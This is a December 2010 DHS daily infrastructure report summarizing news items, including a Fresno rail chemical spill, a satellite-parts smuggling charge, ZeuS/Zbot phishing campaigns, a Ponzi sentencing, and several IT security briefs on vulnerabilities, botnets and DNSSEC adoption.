Wednesday, December 8, 2010

Complete DHS Daily Report for December 8, 2010

Daily Report

Top Stories

• KPMH 26 Visalia reports that a leak from a valve Monday led a rail tanker car in Fresno, California to spill 500 gallons of the toxic chemical magnesium bisulfite. (See item 5)

5. December 6, KMPH 26 Visalia – (California) Rail car spills hazardous material in southeast Fresno. Shortly after 7:30 a.m. December 6, Fresno, California firefighters arrived on the scene of a hazardous material spill in southeast Fresno. A rail tanker car spilled close to 7,500 gallons of magnesium bisulfite onto the ground at Florence Avenue near Cedar. The battalion chief said the tanker began to leak from one of its bottom valves, but the cause is unknown magnesium bisulfite is used in agriculture as a fertilizer. Because the spill was isolated to the area, there appears to be no threat to the public. magnesium bisulfite is potentially dangerous through inhalation and is capable of burning skin. The toxic chemical was contained thanks to good weather conditions. The fire crews responding wore hazmat and respiratory gear to reduce contamination. The fire department said the U.S. Environmental Protection Agency and the owner of the container, Univar, are looking into clean-up options. Source:

• According to the Seattle Post-Intelligencer, federal charges have been brought against a Washington State man accused of attempting to send 300 satellite components to China. (See item 11)

11. December 6, Seattle Post-Intelligencer – (International) Charge: Woodinville man tried to send military equipment to China. Federal prosecutors have brought charges against a 46-year-old man from Woodinville, Washington, accused of smuggling military equipment to China. The suspect was arrested December 3 after nearly 2 years of investigation by the FBI. He is purported to have attempted to send 300 satellite components to China. He allegedly told an informant the parts were meant for the China Space Technology Co.’s spacecraft program. On another occasion, federal investigators contend the suspect said some of the parts would be used in the design of “China’s new generation of passenger jet.” Prosecutors contend he agreed to pay $620,000 to obtain the parts. The suspect is charged with conspiracy to violate federal arms control laws, which carries a maximum term of 5 years in prison. Source:


Banking and Finance Sector

12. December 7, Softpedia – (International) Fake Google and Facebook joint prize campaign leads to Zbot. Security researchers warn spam e-mails suggesting a joint prizes giveaway campaign from Google and Facebook eventually lead to a variant of the Zbot banking Trojan. The fake e-mails purport to come from “Google and Facebook team.” The message suggests Google and Facebook, have decided to join together to give prizes away to users. The e-mails read: “Dear subscriber, As you may know, the holidays are just around the corner, so all of us here at Google and Facebook decided to come together and bring you a new contest with lots of prizes, including, but not limited to, the new Google Chrome OS which will be released in January 2011, Nexus One smartphones, Google Maps GPS for your favourite mobile phone and lots more. Think of it as our way of saying: ‘Thank you!’ for supporting our work all this time. For a chance to win, all you have to do is go to the attached page and follow the instructions. Hope you enjoy, Google & Facebook.” Two of the three mentioned prizes are actually free products, and all are from Google. The attached file is called “Google & Facebook.html” and contains obfuscated JavaScript code. When opened inside a browser it redirects to a Web site that serves an exe file. According to BitDefender security researchers, the file is a trojan downloader written in .NET that requires the .NET Framework installed on the targeted system in order to run. The original dropper installs a secondary downloader that distributes several information stealing Trojans, including Zbot. Source:

13. December 7, Associated Press – (Oregon) FBI: 2 arrests 20 minutes after Ore. bank robbery. The FBI said it took just about 20 minutes for authorities to arrest two women after a robbery at a Clackamas, Oregon, credit union southeast of Portland. An FBI spokeswoman said witnesses report that a woman walked into a Rivermark Community Credit Union about 5 p.m. December 6 and demanded cash. The spokeswoman said the robber left with an undisclosed amount. At about 5:20 p.m., investigators surrounded a southeast Portland home and arrested the two female suspects. The two were booked into the Multnomah County Jail for investigation of bank robbery. The Oregonian said the Clackamas County sheriff’s office, Portland police, and the FBI were involved in the investigation. Source:

14. December 6, Softpedia – (International) ZeuS-related fake electronic tax payment emails are back. Security researchers warn of a new wave of fake Electronic Federal Tax Payment System (EFTPS) e-mails directing users to drive-by download Web sites that distribute the ZeuS banking Trojan. The fake e-mails claim the recipient’s electronic tax payment was rejected due to a error in the submission form. They read: “Your Federal Tax Payment ID: ######## has been rejected. [where # is a digit] Return Reason Code R21 - The identification number used in the Company Identification Field is not valid. Please, check the information and refer to Code R21 to get details about your company payment in transaction contacts section: In other way forward information to your accountant adviser. EFTPS: The Electronic Federal Payment System PLEASE NOTE: Your tax payment is due regardless of EFTPS online availability. In case of an emergency, you can always make your tax payment by calling the EFTPS.” It seems the attack targets businesses that would be forced to use EFTPS as default tax payment method starting from January 2011. According to security researchers from M86 Security, who analyzed the e-mails, the included link takes users to an attack page that tries to exploit vulnerabilities in outdated versions of Java and Adobe Reader. In particular, the exploit pack targets four vulnerabilities in Java and one in Adobe Reader. Successful exploitation of any of them results in a variant of the ZeuS banking Trojan being installed on the system. Source:

15. December 6, Los Angeles Times – (California) West Covina man sentenced to prison for Ponzi scheme. A West Covina, California man was sentenced December 6 to 11 years and 3 months in federal prison for running a Ponzi scheme that brought in about $4 million from more than 107 victims. The convict was also ordered to pay $2,200,771 in restitution to his victims, whom he lured into his investment scheme by promising “guaranteed” annual interest rates as high as 120 percent, according to the U.S. attorney’s office in Los Angeles. The convict, who is a Mexican national, was sentenced by a U.S. District Judge. He was arrested in October 2009 after the FBI searched his West Covina business, New Golden Investments Group, also known as NGI Group, the U.S. attorney’s office said. The convict was indicted in May, and on September 17 he pleaded guilty to one count of mail fraud, one count of money laundering, and one count of misuse of a Social Security number, the statement said. Source:

Information Technology

42. December 7, Help Net Security – (International) Search results for Mono Lake lead to malware. The recent discovery by NASA scientists of a bacteria that uses arsenic in its cellular structure has prompted a lot of people to search the Web for information about it and the place where it was discovered — Mono Lake in California. As it had already been done with many topics that have fired up the imagination and the curiosity of a large number of people, malware peddlers have jumped to the opportunity to funnel that traffic their way and have set up an SEO poisoning campaign. Sunbelt researchers report that Google Images results have been poisoned, making certain images redirect the users to sites that try to download a rogue security tool or to fake Firefox update pages that urge them to download the supposed update for the browser. However, the offered file is a Trojan downloader. Source:

43. December 7, SC Magazine UK – (International) 2010 proves to be the year of the botnet, with new disguise and dropping capabilities expected in 2011. Botnets remained strong in 2010 but new tactics are expected next year. According to the MessageLabs Intelligence 2010 Security Report from Symantec, spam rates peaked in August 2010 at 92.2 percent, with spam from botnets accounting for 88.2 percent of all spam. It also claimed that by the end of 2010 there was a reduction in the contribution of botnets to spam and by the end of this year to this point, the total number of active bots had returned to roughly the same number as at the end of 2009, increasing by about 6 percent in the latter half of 2010. A MessageLabs Intelligence senior analyst at Symantec Hosted Services said there are around 5 million botnets generally active at any one time, but that can vary from three and a half to five and a half million botnets. The report also found while 2010 has experienced fluctuation in the number of botnets and their associated output, the top three botnets have not changed in the latter half of 2010, with Rustock remaining the most dominant botnet, followed by Grum and Cutwail. Source:

44. December 6, PC Pro – (International) Single software license shared 774,651 times. A single license for Avast security software has been used by 774,651 people after it went viral on a file-sharing site, according to the company. Avast noticed that a license for its paid-for security software, sold to a 14-user firm in Arizona, was being distributed online. Rather than shut down the piracy, the company decided to see how far the software would spread. The Avast Pro license showed up on file-sharing sites, and a year and a half later it had topped three-quarters of a million active users. “We found our license code at a number of warez sites around the globe,” said the chief executive of Avast Software. “There is a paradox in computer users looking for ‘free’ antivirus programs at locations with a known reputation for spreading malware.” The license is being used in 200 countries. The company is looking to flip users of the pirated version to genuine software by popping up a notice on machines with the illegally-shared edition offering a link to the free or paid-for versions. Source:

45. December 6, Softpedia – (International) Binary planting vulnerability fixed in Adobe Illustrator CS5. A security and stability update has been released for Adobe Illustrator CS5, fixing a DLL preloading vulnerability which could be exploited to execute arbitrary code. Since files can be loaded directly from network shares or WebDAV resources, this arbitrary code execution condition also has a remote attack vector. The vulnerability in Adobe Illustrator CS5 is identified as CVE-2010-3152 and Adobe rates it as “important.” Users of Illustrator CS 15.0.1 or earlier are strongly advised to install the 15.0.2 update as soon as possible. In addition to the security content, this update contains a series of other bug fixes. Source:

46. December 6, TechWorld – (International) Internet Explorer ‘protected mode’ weakness spelled out. Researchers have found a chink in Internet Explorer’s “protected mode” security armor that hints at trouble for other Windows apps built around the technology, including Google’s Chrome and Adobe’s new Reader X. In a new paper, Verizon Business researchers document ways that an attacker could elevate the privileges of a process to zones where Protected Mode would not apply, such as the local intranet network (which uses UNC paths) or by spoofing the trusted sites list. This leads to the possibility of a relatively simple attack in which malware executes as a low priority process which creates a virtual Web server tied to a local software “loopback” port. Although this process will also be shut out by protected mode, it would be able to point IE to a Web address which appears to be in the Local Internet Zone. By this point, the Web page will be able to render at medium integrity, a potentially dangerous privilege escalation. The weakness found by Verizon does not directly affect other applications that use protected mode security, such as Adobe Reader X or Google Chrome, but it does show how such protection mechanisms will remain open to attack based on the fact that some elements of a system have to be trusted. Source:

47. December 3, The Register – (International) Popular sites caught sniffing user browser history. Security experts from Southern California have caught and 45 other sites pilfering visitors’ surfing habits in what is believed to be the first study to measure in-the-wild exploits of a decade-old browser vulnerability. YouPorn uses JavaScript to detect whether visitors have recently browsed to, and 21 other sites, according to the study. It tracked the 50,000 most popular Web sites and found a total of 46 other offenders, including news sites and, finance site, and sports site “We found that several popular sites — including an Alexa global top-100 site — make use of history sniffing to exfiltrate information about users’ browsing history, and, in some cases, do so in an obfuscated manner to avoid easy detection,” the report states. “While researchers have known about the possibility of such attacks, hitherto it was not known how prevalent they are in real, popular websites.” The 46 sites exploit a widely known vulnerability that currently exists in all production version browsers except of Apple’s Safari. The study also detected code on sites maintained by Microsoft, YouTube, Yahoo, and that perform what the scientists called “behavioral sniffing.” Source:

Communications Sector

48. December 7, The Register – (International) Hacker brings enhanced security to jailbroken iPhones. A computer consultant is adding a security measure known as ASLR to iPhones to make them more resistant to malware attacks. Short for address space layout randomization, ASLR has been absent from all iOS devices since their inception, making possible the types of attacks that commandeered a fully patched iPhone at the Pwn2Own hacker contest. By randomizing the memory locations where injected code is executed, ASLR aims to thwart such exploits by making it impossible to know ahead of time where malicious payloads are located. Starting with Windows Vista, Microsoft has baked ASLR into its operating system, and the recently released mobile version of Windows 7 is also endowed with the protection, said the principal security analyst at Independent Security Evaluators, who cited private conversations with Microsoft engineers. By comparison, Apple has built only limited ASLR into Mac OS X and has left it out of iOS altogether. At a conference scheduled for the week of December 13, a security consultant and application developer for Germany-based SektionEins, plans to unveil a process for jailbreaking iDevices that automatically fortifies them with ASLR. It works by reordering the contents of dyld_shared_cache, a massive file that houses the libraries. Source:

49. December 6, eWeek – (National) DNSSEC Adoption Jumps, But Users Fail to Maintain It Properly: Survey. More and more organizations are implementing DNSSEC on their name servers. But the actual number of signed zones is very low, leaving these organizations vulnerable to cache poisoning attacks. While organizations are beginning to adopt DNSSEC (Domain Name System Security Extensions) to secure their Web sites, most of them have not correctly implemented or maintained according to specifications, according to a survey released by Infoblox December 6. The sixth annual survey of domain name server infrastructure on the Internet is a “census of name servers,” the vice-president of architecture at Infoblox said. The survey identified 15.6 million name servers on the Internet and included only the .org, .com and .net domains, he said. While adoption of the DNS Security Extensions jumped a dramatic 340 percent from 2009, the actual number of “zones” that have been signed is less than 1 percent, the survey said. Considering that organizations went through the trouble of setting up the DNSSEC on their name servers, the fact that only 0.022 percent of the zones were signed was “surprisingly high” and a “clear indicator” they weren’t configuring or maintaining them correctly, the vice president said. In 2009, the number was even smaller, at 0.005 percent, he said. DNSSEC is a set of security extensions that authenticate DNS data to ensure the Web servers the public connects to are authentic and not run by malicious imposters. In a cache poisoning attack, a cybercriminal directs users to a different Web site without their realizing it. Source: